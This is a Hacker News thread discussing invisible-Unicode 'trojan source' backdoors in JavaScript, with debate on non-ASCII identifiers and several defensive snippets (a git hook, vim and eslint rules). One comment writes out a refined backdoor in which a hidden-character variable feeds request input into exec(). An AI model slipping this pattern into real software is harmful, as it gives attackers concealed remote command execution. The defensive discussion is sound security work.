Europeans in general seem to know english very well. This is not the case everywhere. Somehow making english a requirement for programming just doesn't sound fair to me.

capitainenemo · on Nov 10, 2021

I brought this up last time (https://news.ycombinator.com/item?id=29066760) but:

https://github.com/reinderien/mimic

It applies to other contexts besides code. For our user table we have a mariadb collation on the unicodes confusables list which avoids confusable usernames (treated as already existing).

tytso · on Nov 10, 2021

Good code is maintainable code. And while you, as the original programmer, might be perfectly comfortable writing your code using Arabic variables and comments, what if the next person who has to maintain the code is from Korea? Or Russia? Or France? Or China?

OK, maybe you're a small startup in Taiwan and so you don't care about the next maintainer in your company not being able to read or write Chinese. What if you decide to open source your code? Or Meta decides to offer you a zillion dollars to buy you out, but after they do their due diligence, realize that the code is utterly unmaintainable should they decide to outsource internationalizing the code so it will work in Brazil, so that requires native Portguese speakers (who can preferably be paid low, low wages) --- but they can't understand the code because it's using Chinese variables and comments. And then Meta decides to back out from the deal?

matheusmoreira · on Nov 10, 2021

If you're likely to work with an international team, it makes sense to use english. That's not always the case though. Plenty of those low-paid brazilian programmers you cited will never do that. Many of them don't speak english to begin with.

For example, the school I went to had a simple web application for student feedback. Attachments were allowed. People started running into issues due to non-ASCII characters in file names. I reported the issue to the IT department and even helped them fix it. The Python code was written in portuguese, accents and everything. Why shouldn't accents be used in this case? It's unlikely this code will ever be used in an international context.

jimmaswell · on Nov 10, 2021

ASCII is the standard for code for good reason. Everyone can type it. Put whatever you want in comments, but you shouldn't make people have to copy/paste your variable names.

matheusmoreira · on Nov 10, 2021

> you shouldn't make people have to copy/paste your variable names

The people working on a non-english codebase don't have to. Their keyboards have the symbols they're typing.

jimmaswell · on Nov 10, 2021

You're assuming no international collaboration.

UncleMeat · on Nov 10, 2021

> It'll prevent this kind of attacks completely

It won't. The same approach works just fine in your build specification or other config files. And it doesn't solve the root of this problem, which is that you are compiling source code you don't control and don't audit closely into your binary. Sneaky text is not the only way of getting malicious code through code review.

Tepix · on Nov 10, 2021

That seems like throwing out the baby with the bathwater. We don't all want to go back to the IT stone age of 1963.

goldsteinq · on Nov 10, 2021

You still can use Unicode in comments and string literals. You just can't use non-ASCII characters in identifiers.

Unicode in identifiers is just a bad idea.

1. It creates a security consideration with confusable identifiers (and lints don't always catch these)

2. It breaks tooling with RTL identifiers

3. It may not render correctly depending on fonts

4. It may be hard to type depending on keyboard layout

5. There really isn't a good reason to use non-ASCII idents anyway

lifthrasiir · on Nov 10, 2021

> 1. It creates a security consideration with confusable identifiers (and lints don't always catch these)

O/0 and I/1/l are confusable characters within ASCII. I'm not kidding here, they are actual entries in the Unicode confusables database [1]. But no one wants to remove those characters from identifiers.

[1] For example, https://util.unicode.org/UnicodeJsps/confusables.jsp?a=0&r=N...

> 2. It breaks tooling with RTL identifiers

It rather unbreaks tooling with no RTL support.

> 3. It may not render correctly depending on fonts

So does Unicode in comments and string literals. In fact the purported Trojan "attack" was mostly about string literals. So why should they be allowed in strings but disallowed in identifiers?

> 4. It may be hard to type depending on keyboard layout

Did you know that not every Latin keyboard layout supports a backquote (`)? This was the actual reason that the repr(expr) shortcut got removed from Python 3 [2].

[2] https://mail.python.org/pipermail/python-ideas/2007-January/...

> 5. There really isn't a good reason to use non-ASCII idents anyway

My canonical answer from the experience is that not every programmer who can understand English documentations can easily write and comprehend English in general. For those people having a non-ASCII identifier support is a great relief, as it frees them from choosing "correct" English identifiers. You can disallow them for your project if you want (or conversely, make it an optional feature disabled by default), but they are relevant for someone else.

cedilla · on Nov 10, 2021

> it frees them from choosing "correct" English identifiers

Even if you have fluent English skills, sometimes translations just confuse the issue. It's sometimes better to use an untranslated word instead of introducing ambiguity, especially when a term originates from a local law.

lifthrasiir · on Nov 10, 2021

Like CNLabelContactRelationYoungerCousinMothersSiblingsDaughterOrFathersSistersDaughter [1]? :-) You are very much correct.

[1] https://news.ycombinator.com/item?id=28712667

__s · on Nov 10, 2021

> O/0 and I/1/l are confusable characters within ASCII

Which is why the first thing I make sure of when looking at programming fonts is how well they differentiate these characters

koheripbal · on Nov 10, 2021

Agreed - this is literally the first thing I check when selecting the editor's font

josephcsible · on Nov 10, 2021

> O/0 and I/1/l are confusable characters within ASCII.

You're mixing up two different ways that people use the word "confusable": things that look similar in some fonts, versus things that look exactly the same regardless of font. I want the latter to be banned from source files but not the former.

lifthrasiir · on Nov 10, 2021

Confusables are a defined concept in Unicode [1]. And there seems no other good way to define "confusables", since many if not most pairs of characters are distinguishable in some but not all fonts and you can always make a font that distinguishes every code point (I once did that, for example distinguishing Latin-Greek-Cyrillic homoglyphs in subtle ways).

[1] https://www.unicode.org/reports/tr39/#Confusable_Detection

josephcsible · on Nov 11, 2021

> you can always make a font that distinguishes every code point

Even ones like zero-width joiners and right-to-left marks?

lifthrasiir · on Nov 11, 2021

Sure, every graphic code point ;-)

But we are talking about Unicode identifiers, and the Unicode recommendation doesn't allow BiDi markers in identifiers and has a provision to limit the use of ZWJ and ZWNJ in them.

mkl · on Nov 10, 2021

Non-ASCII identifiers can be useful for maths too. E.g. I use λ sometimes, especially in Python where "lambda" is a keyword. (I have AutoHotKey and Espanso hotstrings to make typing such symbols easy.)

Tepix · on Nov 12, 2021

It allows people to code who may not even speak english. That seems more important than your reasons.

cema · on Nov 13, 2021

This argument seems to assume that people who do not know English cannot figure out how to use ASCII character set for identifiers. If so, it is rather incorrect. Is there something else here, maybe?

Tepix · on Nov 13, 2021

Yes if they don't speak english they will want to use non ASCII identifiers because that's what non english words use.

CodesInChaos · on Nov 10, 2021

The compiler disallowing them globally might count as that. But individual crates enforcing an "ascii only" policy makes sense, if they never plan to use non-ascii.

Personally I'd prefer even one step further: the compiler would disallow them by default, and you can opt into specific character sets/languages at a crate level. e.g. `AllowSpecialCharacters("de")` to enable on special characters common in German.

Ygg2 · on Nov 10, 2021

Agreed. I use Unicode identifiers to spot shitcode. This would really hamper my detection abilities.

Jokes aside, if you're writing Unicode identifiers it means you're not writing your code to be read by a broad audience.

lifthrasiir · on Nov 10, 2021

`#![forbid(...)]` is a crate-wide attribute, so it is more like a policy (that is good to have if your code would be entirely ASCII).

robertrbairdii · on Nov 10, 2021

There's definitely a benefit to using a linter and a tool such as prettier. Using prettier pushes the hidden character onto an additional line in the checkCommands array which makes it much easier to spot that something is wrong even if you're not using the trailingCommas setting.

https://imgur.com/a/gYKylyH

I think this eslint rule would also be able to defend against the initial destructuring of the query object by defining a regex that identifiers have to match which would exclude those invisible characters https://eslint.org/docs/rules/id-match

Andys · on Nov 11, 2021

Indeed, this wouldn't even compile in Go.

cphoover · on Nov 10, 2021

I imagine this can be defended again pretty easily with a lint rule that prevents these unicode characters in variables. pretty ingenious little hack though.

The eslint rule id-match, which require identifiers to match a specified regular expression, would be useful here. For example:

    "id-match": ["error", "^[a-z]+([A-Z][a-z]+)*$"]

bluepnume · on Nov 10, 2021

A malicious PR could also add the character to your eslintrc too though. You'd be forgiven for seeing the line change in the diff and thinking it was just some reformatting.

cphoover · on Nov 10, 2021

that would show up on a diff and would elicit a question in code review hopefully of why the .eslintrc file was being changed in this way. This another good argument for a comprehensive code review process.

also you could lock this file down with a CODEOWNERS file so only certain trusted contributors could modify the lint configuration. You could also do exclusionary pattern matching to make sure none of the bad characters do exist in identifier names... Or you could write your eslint configuration as a separate module to be npm installed... or you could write a eslint rule plugin that disallows non-ascii identifiers and then npm install that... lots of different ways to skin this cat to add security.

jraph · on Nov 10, 2021

It seems like things displaying diffs could use a specific color for lines only changed by formatting or indentation (indentation can have significant meaning like in Python but this would probably be good enough)

dotancohen · on Nov 10, 2021

I believe that Git diff - which has features not supported by regular diff such as --word-diff - can differentiate between whitespace-only line changes. The Jetbrains IDE, which I believe uses Git diff behind the scenes, will show who originally wrote a line even if it has been whitespace-reformatted later.

mirekrusin · on Nov 10, 2021

I don’t think this is JavaScript specific. It’s like saying “BMW cars in Paris stop working if you pour sugar in tank”.

UncleMeat · on Nov 10, 2021

This whole story has been stupid. These ideas have been around for ages and are not novel to the security community. Yet we've seen headlines like "all programs ever are vulnerable to this new hack." The root cause is not unicode characters but instead untrusted text. It isn't like a malicious library would be unable to sneak backdoors in through ascii source anyway. Heck, we just had a big kerfuffle over this happening in the linux kernel this year.

Or worse! Go look at the dependencies for some large enterprise system built in java. How many raw jars do you think are being included in there? Has anybody looked at the bytecode of these jars?

bestham · on Nov 10, 2021

The point is not that the vulnerability is a trait of javascript but to make a demonstration on how different unicode characters can be used to create a vulnerability, exemplified by a piece of javascript.

mirekrusin · on Nov 10, 2021

Yes, I understand it, but title and content doesn't explicitly mention this "detail" that same attact vector exists for other languages and data formats.

dspillett · on Nov 10, 2021

> I don’t think this is JavaScript specific.

It isn't, any relatively dynamic language is going to have these or similar issues. Many moons ago I saw similar examples in bash, I'm sure they are possible in PHP, ..., ..., ...

In fact, even the more strict languages probably do to: the “accidentally run something malicious via care-free use of exec” is an issue in just every language that has “exec”/similar - it is a data trusting error in the programmer's logic not an issue with the language itself. The dynamic nature of some of JS's syntax is just one way to pollute the data being fed to exec amongst the other sources (user input, being too trusting of config in the DB or filesystem, and so forth).

Javascript is a very good option to use for examples though: most devs know it well enough and it is everywhere so the potential scale of the danger is obvious, even more so in light of people being far too trusting of dependencies pulled via NPM and the recent examples of malicious updates getting into common packages.

Maybe the title could be a bit less click-baity, though I'm not sure what would be used instead that wouldn't be overly wordy for a punchy article title.

fergie · on Nov 10, 2021

Strong typing doesn't fix the issue that invisible characters can be used as variable names.

pumpum · on Nov 10, 2021

Good point. FYI, sugar in the gas tank is a myth. The sugar will cause basically no harm at all, I've witnessed it attempted.

fergie · on Nov 10, 2021

Running prettier on the code makes the "hidden" variables fairly obvious -> https://imgur.com/a/MhhRpwq

That said, nothing on my buildchain actually throws an error or warning.

DyslexicAtheist · on Nov 10, 2021

>> That said, nothing on my buildchain actually throws an error or warning.

use hooks for CI on pre-commit / merge and pull requests e.g. like this pre-commit which would catch bi-directional trojan sources:

  #!/usr/bin/env python3
  import sys
  import subprocess

  bidi_chars = '\u202A\u202B\u202D\u202E\u2066\u2067\u2068\u202C\u2069'

  for line in sys.stdin:
      old, new, ref = line.split()
      diff = subprocess.run(['git', 'diff', old, new],
              stdout=subprocess.PIPE,
              stderr=subprocess.STDOUT,
              text=True)
      if diff.returncode != 0:
          print(diff.stdout)
          sys.exit(f'git diff ended with rc={diff.returncode}, receive TERMINATED')
      if any(c in diff.stdout for c in bidi_chars):
          print(diff.stdout)
          sys.exit('Possible Trojan Source Attack, receive REFUSED')

I wish github/gitlab would provide such features available out of the box which also follow best practice, so people can stop pasting them from the web or reinvent our own version in every team ...

brabel · on Nov 10, 2021

Obvious as in an empty line? Not very obvious to me.

kuon · on Nov 10, 2021

My editor (vim) will warn me with a loud visual red block for any non ascii char outside a string literal. But I do not think that is enough. Compiler and interpreter must be more strict.

gpvos · on Nov 10, 2021

That's not the default vim configuration though.

tomxor · on Nov 10, 2021

Mind sharing the relevant config line?

I thought this was default but just realised it only does the <FFFF> thing when there is no printable glyph available.

Allowing printable unicode in strings seems like a nice balance if it can be done reliably.

fatheart · on Nov 10, 2021

After seeing this thread I added the following to my vimrc:

  highlight link NonASCII Error
  autocmd Syntax * :syntax match NonASCII "[^\d0-\d127]"

Obviously haven't been using it long, and I'm not confident enough in my vim knowledge to vouch for its correctness, but it works in the limited amount of scenarios I tested so far.

kuon · on Nov 11, 2021

Sure:

    fun! HighlightNonAscii()
      if &ft =~ 'markdown\|text'
        return
      endif
      syntax match nonascii "[^\x00-\x7F]"
      highlight nonascii guibg=#ff2232 guifg=#000000
    endfun

    autocmd BufEnter * call HighlightNonAscii()

Your version might depend on your frontend (gui, terminal...). And you might want to filter more file types.

jrochkind1 · on Nov 10, 2021

I'm surprised VS Code doesn't at least have that option. (Or does it?)

myfonj · on Nov 10, 2021

It has `editor.renderControlCharacters` but only recently started displaying few dangerous previously invisible ones (directional overrides) natively [1], but besides that you had to use extension that adds highlights for non-ascii non-whitelisted [2] or predefined [3] characters.

[1] https://github.com/microsoft/vscode/issues/116939 [2] https://marketplace.visualstudio.com/items?itemName=nachocab... [3] https://marketplace.visualstudio.com/items?itemName=nhoizey....

ludovicianul · on Nov 10, 2021

On a similar note, if you want to test your REST APIs for weird characters, I built a tool for this: (https://github.com/Endava/cats#leadingcontrolcharsinfieldstr...)

SenpaiHurricane · on Nov 10, 2021

TS + Intellij

https://ibb.co/MfLLNQL

Mockapapella · on Nov 10, 2021

If anyone is interested, I wrote an article a while back exploring which unicode characters Python allows you to set variables equal to: https://www.thelisowe.com/why-can-be-a-variable-in-python-bu...

This was originally done with the goal of trying to hide/encode one program within another using non-displayable characters (such as zero width spaces), I just never got around to it. But reading this article has kind of reignited that interest for me and I think I might take another crack at that soon.

rurban · on Nov 14, 2021

A, the famous hangul filler. That's actually a Unicode bug they refuse to fix for some years now. It's still listed as identifier. I fixed that in my interpreter cperl.

The next bugs are actually all JavaScript bugs, as they accept Unicode identifiers but don't check against the Unicode security guidelines, ignoring any profile. Accepting bidi, mixed scripts, unnormalized identifiers. This is very common, 99% of all interpreters and compilers don't care about Unicode security at all. They are rather proud to accept everyone, and point fingers at colleagues who only accept ASCII english.

Identifiers need to be identifiable by a human. That's the whole point. And the system needs to block illegal identifiers.

Similar to filesystem drivers, which consists of path names as identifiers, but the driver writers think they are beyond such human issues. For them there is only garbage in, garbage out. Their pathnames are certainly not identiable. A directory can consist of bidi names, or Russian and Greek mixed scripts who all look the same. Or just not normalized. There can be a multiple of visually duplicate names, and you never know which is which. At least with domain names they came up with a punycode solution, but this was only the tip on the iceberg. And it was a rather awkward workaround.

speleding · on Nov 10, 2021

I think the recommendation to disallow any non-ASCII character is throwing out the baby with the bathwater.

How about code that wants to display some emojis? It would be cumbersome to use hex unicode everywhere. And while localisations should typically happen in a separate language file, it's very common to want some text in code intended for a single audience.

Blocking all the confusables might be tricky, and an allow list would be endless. Perhaps some magic pre-processor comment that says "allow unicode in this file".

josteink · on Nov 10, 2021

> I think the recommendation to disallow any non-ASCII character is throwing out the baby with the bathwater.

Not throwing out all non-ASCII characters from code-files. Just throwing them out as being invalid identifiers in your code (think variables, function-names, etc).

> How about code that wants to display some emojis?

Fine. You quote that emoji in a string, and it's golden.

You try to make a variable with the name of an emoji however, you code crashes.

That sounds fine to me.

speleding · on Nov 10, 2021

That would close this particular attack (but not the BIDI one the article mentions). But there is probably already too much code out there with π=3.14 in it to be feasible to do this.

smcl · on Nov 10, 2021

I really thought that using the greek letter for pi (or theta, etc) was something you do to show your programming language supports unicode identifiers but that nobody actually does in real life. I wonder how people input this, do they know the Alt+xyz combo, do they select-copy-paste or is there another way that to write these characters that I'm not aware of?

Just to be clear, I don't mean people who are actually using Greek language for input - it's pretty obvious how they would type that character :)

speleding · on Nov 11, 2021

pi is simply alt+p on the Mac, pretty easy to remember.

josteink · on Nov 10, 2021

> But there is probably already too much code out there with π=3.14 in it to be feasible to do this.

So for JS let it break in new, module based strict-mode code.

That’s going to be processed by tooling prior to shipping anyway, so that’ll get caught.

For other platforms do the same. In some forward-looking revision of the language/compiler.

People has to fix obsolete/deprecated stuff in newer compilers/class libraries all the time. This is no different.

YetAnotherNick · on Nov 10, 2021

Do you really have to write emoji in the code string? Similarly with international language characters. The sane thing is to use either json config files or i18n libraries.

speleding · on Nov 10, 2021

If you are writing something intended for a single audience using i18n libraries can be unnecessary overhead. And emoji can also be icons like ⌘ that can be useful to display in the UI.

aww_dang · on Nov 10, 2021

Yes, the Unicode characters are a problem. But do the norms and tooling play a role here as well?

Explicitly casting types, like String parameters to integers would make this much more explicit. The convenience of accessing parameters via destructuring, vs explicitly request.getParameter("\u3164"). Having a static array of permissible commands declared elsewhere.

There's something to be said for verbosity and explicitness. Where the tooling and norms shun it, these 'invisible' backdoors can gain advantage.

lovasoa · on Nov 10, 2021

The `cmd &&` looks fishy in their example, and would probably have been removed in a review. Instead, one could write :

    const { ping, curl, ㅤ } = req.query;
    const checkCommands = [
        ping && 'ping -c 1 google.com',
        curl && 'curl -s http://example.com/', ㅤ
    ];

    await Promise.all(checkCommands.map(cmd => cmd && exec(cmd, { timeout: 5_000 })));

This way the `cmd &&` is justified

testASW2 · on Nov 10, 2021

geoduck14 · on Nov 10, 2021

This is MOST interesting.

I wonder if Git or Stack Overflow should highlight non Ascii characters to reduce malicious actors using this in code.

laktak · on Nov 10, 2021

This shows up in standard Vim as a [HF] symbol.

kreetx · on Nov 10, 2021

Same in vanilla emacs.

nathell · on Nov 10, 2021

What was wrong with only allowing ASCII in identifiers?

jgalt212 · on Nov 10, 2021

seriously, I'd fire anyone who put any emoji in an identifier.

chrismorgan · on Nov 10, 2021

Sensible languages follow UAX #31 <https://www.unicode.org/reports/tr31/> for Unicode identifiers, which doesn’t allow emoji.

skrebbel · on Nov 10, 2021

But it does allow hangul fillers, apparently.

wnevets · on Nov 10, 2021

If you use Sublime Text the Gremlins[0] package will detect and light up these kind of characters

[0] https://packagecontrol.io/packages/Gremlins

Suvitruf · on Nov 10, 2021

This issue and example used are more about data validation and escaping characters.

est · on Nov 10, 2021

IO operations, especially involving a subprocess is prone to have backdoors. They are practically unverifiable.

I've yet to see a unicode backdoor in pure algorithmic flows.

willvarfar · on Nov 10, 2021

Some examples of historic attacks you could embed in algorithms:

“Salami slicing” is a kind of embezzlement where eg an insider programs the computer to credit small amounts to the last account (and then opens an account with a name beginning with Z).

In the 90s there was a massive hushed up scandal where the programmers developing the early Barclaycard made the pseudo random number generator for pin codes just issue three distinct pins. This meant that a stolen card could be easily used because they could guess any pin in three goes before the ATM swallowed the card.

This is hardly an exhaustive list. It’s just to get peoples cogs turning… :)

null_object · on Nov 10, 2021

> In the 90s there was a massive hushed up scandal where the programmers developing the early Barclaycard made the pseudo random number generator for pin codes just issue three distinct pins. This meant that a stolen card could be easily used because they could guess any pin in three goes before the ATM swallowed the card.

Citation for this?

willvarfar · on Nov 10, 2021

Took some digging to find any working links these days. The three pin thing is on page two but it doesn’t name which bank; I may have misremembered and it might not have been Barclays. The whole article is a good starting point for digging into other vulnerabilities and exploits too https://www.theregister.com/2005/10/21/phantoms_and_rogues/

dlsa · on Nov 10, 2021

Compilers and interpreters need a new pass to detect these characters in code and treat them as hard errors. This doesn't stop their use in comments where presumably they are still ok.

Alternatively, there needs to be an uptake of the use of code linters and pretty printers.

A bit of both perhaps.

sihox · on Nov 10, 2021

Just being curious I've pasted the example to Geany and VSCode and in both this invisible character was visible :) I can't remember setting some special character / whitespace visibility options but I think it is good to have this kind of options always on.

FrankyHollywood · on Nov 10, 2021

> In our experience non-ASCII characters are pretty rare in code. Many development teams chose to use English as the primary development language

Is this true for the whole world, or just Europe/US?

afavour · on Nov 10, 2021

It is. The way it was explained to me, all the APIs you use are in English so naming variables in your local language is futile at best and would just require constant context switching.

I remember many moons ago MooTools announced international API translations as an April Fools joke. It did make me wonder if there’s an interesting programming experiment to be done there… but I’m a native English speaker so I’m not best positioned to know!

mijamo · on Nov 10, 2021

Not my experience. Plenty of codebases have variables in local language in France Germany and Sweden (where I have experience).

I actually have encountered a lot of problem with English codebases in those countries as they often try to translate regional concepts that are not directly translatable. This is particularly annoying when it comes to administrative stuff where one English word can refer to different local concepts (ex: geographical divisions of the territory) and translations always clumsy. I have even seen nasty bugs come from there, where a "county" had a different meaning in different places of the code as different teams had different idea of what a county was but didn't discuss it.

utrack · on Nov 10, 2021

Yep, pretty much (Russian here)

greyhair · on Nov 11, 2021

From what I have been reading lately, web3 will fix all of this. \s

reilly3000 · on Nov 10, 2021

While this is an interesting hack, the larger issue in the example is allowing any query parameter to write into a subprocess. exec() immediately throws flags for me, especially when it isn’t necessary like in the case of making an http call. Even when it isn’t passing arbitrary inputs from the web to the command line, it’s susceptible to DoS that could crash the whole kernel instead of just the web server. I get that this is just a contrived example to show the risk of hidden characters, but please don’t use process.exec() unless you have no other options.

rafaelturk · on Nov 10, 2021

Nice article, it was a fund reading it. Albeit I don't think this kind of attack is restricted to just JavaScript.

ewagsjr · on Nov 11, 2021

They put the answer in quotes right after they ask if you can find it. Highlight it and hit control + f.

egberts1 · on Nov 11, 2021

Take two of those Hangu (“blank” and “half-blank”) characters you make two variable names…

Couple it with JS obfuscator…

(something, something)…

Profit!

Lorin · on Nov 11, 2021

I use the "nhoizey.gremlins" VSC extension which would cover these.

Cameri · on Nov 10, 2021

Is there an eslint plugin to prevent invisible characters on .js/.ts files?

Eriks · on Nov 10, 2021

good reason to not use comma when destructuring an object

smhg · on Nov 10, 2021

You mean the last trailing comma? Or not destructions into multiple variables?

vjeux · on Nov 10, 2021

Another reason to use prettier, this will be formated in a confusing way and has a higher chance of being spotted by a human!

More-nitors · on Nov 10, 2021

maybe someone should make a linter for this...

trevinhofmann · on Nov 10, 2021

Added to my own ESLint config: https://github.com/trevinhofmann/eslint-config-principled/pu...

pabs3 · on Nov 10, 2021

There is one for Go called glyphcheck:

https://github.com/NebulousLabs/glyphcheck

cyberpsybin · on Nov 10, 2021

This needs to be patched. Although at this point there might be code depending on this.

onion2k · on Nov 10, 2021

If you combined this attack with Whitespace (https://en.wikipedia.org/wiki/Whitespace_(programming_langua...) you could embed entire programs in your JS code.

tyingq · on Nov 10, 2021

Perl has a module called Acme::Bleach that does that for you.